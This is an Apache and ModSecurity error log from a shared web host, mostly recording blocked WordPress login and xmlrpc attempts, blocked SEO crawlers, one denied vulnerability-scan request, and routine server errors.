[Tue May 26 18:38:03.844607 2026] [security2:error] [pid 1015481:tid 1015642] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbM7QIKfWDMlp2INdIAAAAASk"]
[Tue May 26 18:38:04.577226 2026] [security2:error] [pid 1015481:tid 1015493] [remote 121.200.216.55:59978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWbNLQIKfWDMlp2INdIGgABLws"]
[Tue May 26 18:38:06.319692 2026] [security2:error] [pid 1015481:tid 1015619] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbNbQIKfWDMlp2INdINwAAARI"]
[Tue May 26 18:38:07.300178 2026] [security2:error] [pid 1015481:tid 1015527] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbN7QIKfWDMlp2INdIXAABYi0"]
[Tue May 26 18:38:07.300371 2026] [security2:error] [pid 1015481:tid 1015699] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbN7QIKfWDMlp2INdIXAABYi0"]
[Tue May 26 18:38:08.031964 2026] [security2:error] [pid 1015481:tid 1015614] [client 185.191.171.15:26850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahWbOLQIKfWDMlp2INdIbgAAAQ0"]
[Tue May 26 18:38:08.032087 2026] [security2:error] [pid 1015481:tid 1015614] [client 185.191.171.15:26850] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahWbOLQIKfWDMlp2INdIbgAAAQ0"]
[Tue May 26 18:38:08.129921 2026] [autoindex:error] [pid 1015481:tid 1015704] [client 43.130.32.245:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.gldmarsa.com
[Tue May 26 18:38:08.391699 2026] [core:error] [pid 1015481:tid 1015679] (104)Connection reset by peer: [client 20.206.67.134:6436] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:38:08.996543 2026] [security2:error] [pid 1015481:tid 1015702] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbOLQIKfWDMlp2INdIggAAAWU"]
[Tue May 26 18:38:10.923324 2026] [security2:error] [pid 1015481:tid 1015532] [remote 168.63.79.147:36624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWbOrQIKfWDMlp2INdItQABHTI"]
[Tue May 26 18:38:11.095122 2026] [security2:error] [pid 1015481:tid 1015647] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWbO7QIKfWDMlp2INdIxgAAAS4"]
[Tue May 26 18:38:11.979843 2026] [security2:error] [pid 1015481:tid 1015620] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbO7QIKfWDMlp2INdI2AAAARM"]
[Tue May 26 18:38:12.118386 2026] [security2:error] [pid 1015481:tid 1015616] [client 167.160.68.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWbPLQIKfWDMlp2INdI6AAAAQ8"], referer: https://www.anujtradingco.com/
[Tue May 26 18:38:13.411355 2026] [security2:error] [pid 1015481:tid 1015655] [client 167.160.68.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWbPbQIKfWDMlp2INdJBQAAATY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1514070&moderation-hash=45a87fbcca7ca2aed9f3d609eb26ecc9
[Tue May 26 18:38:14.006875 2026] [security2:error] [pid 1015481:tid 1015686] [client 124.43.5.103:60565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbPrQIKfWDMlp2INdJFQAAAVU"]
[Tue May 26 18:38:14.007056 2026] [security2:error] [pid 1015481:tid 1015686] [client 124.43.5.103:60565] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbPrQIKfWDMlp2INdJFQAAAVU"]
[Tue May 26 18:38:14.401325 2026] [security2:error] [pid 1015481:tid 1015638] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbPbQIKfWDMlp2INdJFAAAASU"]
[Tue May 26 18:38:14.697722 2026] [security2:error] [pid 1015481:tid 1015561] [remote 103.95.119.103:38928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWbPrQIKfWDMlp2INdJIQABFk8"]
[Tue May 26 18:38:15.641036 2026] [core:error] [pid 1015481:tid 1015708] (104)Connection reset by peer: [client 20.206.67.134:6429] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:38:15.681129 2026] [security2:error] [pid 1015481:tid 1015660] [client 104.23.221.188:13842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blettclms.com"] [uri "/wp-admin/install.php"] [unique_id "ahWbP7QIKfWDMlp2INdJOAAAATs"]
[Tue May 26 18:38:15.824556 2026] [security2:error] [pid 1015481:tid 1015554] [remote 222.252.11.133:54807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 133.11.252.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWbP7QIKfWDMlp2INdJPAABV0g"]
[Tue May 26 18:38:16.415614 2026] [security2:error] [pid 1015481:tid 1015599] [remote 54.37.3.199:42084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.3.37.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbQLQIKfWDMlp2INdJSAABMHU"]
[Tue May 26 18:38:16.422574 2026] [security2:error] [pid 1015481:tid 1015719] [client 54.38.147.230:40338] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWbQLQIKfWDMlp2INdJTwAAAXY"]
[Tue May 26 18:38:16.422705 2026] [security2:error] [pid 1015481:tid 1015719] [client 54.38.147.230:40338] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWbQLQIKfWDMlp2INdJTwAAAXY"]
[Tue May 26 18:38:16.764593 2026] [security2:error] [pid 1015481:tid 1015679] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbQLQIKfWDMlp2INdJTgAAAU4"]
[Tue May 26 18:38:17.141260 2026] [security2:error] [pid 1015481:tid 1015701] [client 104.23.221.189:11988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/wp-admin/install.php"] [unique_id "ahWbQLQIKfWDMlp2INdJRwABZFE"]
[Tue May 26 18:38:17.381891 2026] [log_config:warn] [pid 1007701:tid 1007893] (32)Broken pipe: [client 102.89.83.210:12895] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:38:17.381909 2026] [log_config:warn] [pid 1007701:tid 1007893] (32)Broken pipe: [client 102.89.83.210:12895] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:38:17.381969 2026] [log_config:warn] [pid 1007701:tid 1007893] (32)Broken pipe: [client 102.89.83.210:12895] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:38:17.381974 2026] [log_config:warn] [pid 1007701:tid 1007893] (32)Broken pipe: [client 102.89.83.210:12895] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:38:17.868899 2026] [security2:error] [pid 1015481:tid 1015707] [client 51.222.168.203:56834] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.panda-eco.com"] [uri "/"] [unique_id "ahWbQbQIKfWDMlp2INdJcQAAAWo"]
[Tue May 26 18:38:17.869017 2026] [security2:error] [pid 1015481:tid 1015707] [client 51.222.168.203:56834] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.panda-eco.com"] [uri "/"] [unique_id "ahWbQbQIKfWDMlp2INdJcQAAAWo"]
[Tue May 26 18:38:18.088940 2026] [security2:error] [pid 1015481:tid 1015568] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbQrQIKfWDMlp2INdJcwABNFY"]
[Tue May 26 18:38:18.089083 2026] [security2:error] [pid 1015481:tid 1015653] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbQrQIKfWDMlp2INdJcwABNFY"]
[Tue May 26 18:38:18.370110 2026] [security2:error] [pid 1015481:tid 1015600] [remote 222.252.11.133:54807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 133.11.252.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWbQrQIKfWDMlp2INdJfQABcHY"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 18:38:19.176682 2026] [security2:error] [pid 1015481:tid 1015661] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWbQ7QIKfWDMlp2INdJjAAAATw"], referer: https://www.anujtradingco.com/
[Tue May 26 18:38:20.159538 2026] [security2:error] [pid 1015481:tid 1015730] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbQ7QIKfWDMlp2INdJlQAAAYE"]
[Tue May 26 18:38:20.190757 2026] [security2:error] [pid 1015481:tid 1015687] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWbRLQIKfWDMlp2INdJoAAAAVY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157062&moderation-hash=c23f0f591a039229d82b3f206724dd57
[Tue May 26 18:38:20.811341 2026] [security2:error] [pid 1015481:tid 1015729] [client 146.56.204.198:51609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.204.56.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfrastructures.com"] [uri "/lib/webuploader/0.1.5/server/preview.php"] [unique_id "ahWbRLQIKfWDMlp2INdJrQAAAYA"]
[Tue May 26 18:38:21.998850 2026] [security2:error] [pid 1015481:tid 1015698] [client 167.160.68.179:13457] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWbRbQIKfWDMlp2INdJuAAAAWE"], referer: https://anujtradingco.com
[Tue May 26 18:38:22.359487 2026] [security2:error] [pid 1015481:tid 1015725] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbRbQIKfWDMlp2INdJxwAAAXw"]
[Tue May 26 18:38:22.921245 2026] [security2:error] [pid 1015481:tid 1015585] [remote 154.66.198.148:62364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbRrQIKfWDMlp2INdJ1gABJGc"]
[Tue May 26 18:38:23.015556 2026] [core:error] [pid 1015481:tid 1015625] (104)Connection reset by peer: [client 20.206.67.134:6412] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:38:24.711427 2026] [security2:error] [pid 1015481:tid 1015603] [remote 82.196.25.136:41130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWbSLQIKfWDMlp2INdJ9wABOXk"]
[Tue May 26 18:38:25.162933 2026] [security2:error] [pid 1015481:tid 1015691] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbSLQIKfWDMlp2INdJ_QAAAVo"]
[Tue May 26 18:38:25.237209 2026] [security2:error] [pid 1015481:tid 1015616] [client 124.43.5.103:23103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbSbQIKfWDMlp2INdKAgAAAQ8"]
[Tue May 26 18:38:25.237354 2026] [security2:error] [pid 1015481:tid 1015616] [client 124.43.5.103:23103] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbSbQIKfWDMlp2INdKAgAAAQ8"]
[Tue May 26 18:38:26.136356 2026] [security2:error] [pid 1015481:tid 1015495] [remote 103.11.102.22:34424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbSbQIKfWDMlp2INdKEgABaA0"]
[Tue May 26 18:38:27.124496 2026] [security2:error] [pid 1015481:tid 1015692] [client 92.222.104.201:40810] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "omshriinfrastructures.com"] [uri "/robots.txt"] [unique_id "ahWbS7QIKfWDMlp2INdKUgAAAVs"]
[Tue May 26 18:38:27.124660 2026] [security2:error] [pid 1015481:tid 1015692] [client 92.222.104.201:40810] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "omshriinfrastructures.com"] [uri "/robots.txt"] [unique_id "ahWbS7QIKfWDMlp2INdKUgAAAVs"]
[Tue May 26 18:38:27.735484 2026] [security2:error] [pid 1015481:tid 1015660] [client 213.230.93.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbS7QIKfWDMlp2INdKWAAAATs"]
[Tue May 26 18:38:27.838591 2026] [security2:error] [pid 1015481:tid 1015715] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbS7QIKfWDMlp2INdKXgAAAXI"]
[Tue May 26 18:38:27.960692 2026] [security2:error] [pid 1015481:tid 1015645] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWbS7QIKfWDMlp2INdKbgAAASw"], referer: https://www.bloggertarget.com
[Tue May 26 18:38:28.469937 2026] [security2:error] [pid 1015481:tid 1015673] [client 167.114.139.51:19178] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "omshriinfrastructures.com"] [uri "/"] [unique_id "ahWbTLQIKfWDMlp2INdKfgAAAUg"]
[Tue May 26 18:38:28.470039 2026] [security2:error] [pid 1015481:tid 1015673] [client 167.114.139.51:19178] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "omshriinfrastructures.com"] [uri "/"] [unique_id "ahWbTLQIKfWDMlp2INdKfgAAAUg"]
[Tue May 26 18:38:29.013822 2026] [security2:error] [pid 1015481:tid 1015548] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbTLQIKfWDMlp2INdKgwABZUI"]
[Tue May 26 18:38:29.014203 2026] [security2:error] [pid 1015481:tid 1015702] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbTLQIKfWDMlp2INdKgwABZUI"]
[Tue May 26 18:38:30.249376 2026] [core:error] [pid 1015481:tid 1015644] (104)Connection reset by peer: [client 20.206.67.134:6437] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:38:30.425749 2026] [security2:error] [pid 1015481:tid 1015722] [client 34.116.215.253:31011] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWbTrQIKfWDMlp2INdKnwABeTc"], referer: https://politica-global.com/
[Tue May 26 18:38:30.466165 2026] [security2:error] [pid 1015481:tid 1015714] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbTrQIKfWDMlp2INdKnAAAAXE"]
[Tue May 26 18:38:33.152390 2026] [security2:error] [pid 1015481:tid 1015621] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbULQIKfWDMlp2INdKxwAAARQ"]
[Tue May 26 18:38:35.638102 2026] [security2:error] [pid 1015481:tid 1015703] [client 124.43.5.103:61136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbU7QIKfWDMlp2INdK-gAAAWY"]
[Tue May 26 18:38:35.638229 2026] [security2:error] [pid 1015481:tid 1015703] [client 124.43.5.103:61136] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbU7QIKfWDMlp2INdK-gAAAWY"]
[Tue May 26 18:38:35.686485 2026] [security2:error] [pid 1015481:tid 1015732] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbU7QIKfWDMlp2INdK7wAAAYM"]
[Tue May 26 18:38:37.855423 2026] [core:error] [pid 1015481:tid 1015638] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:38:37.855447 2026] [core:error] [pid 1015481:tid 1015638] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
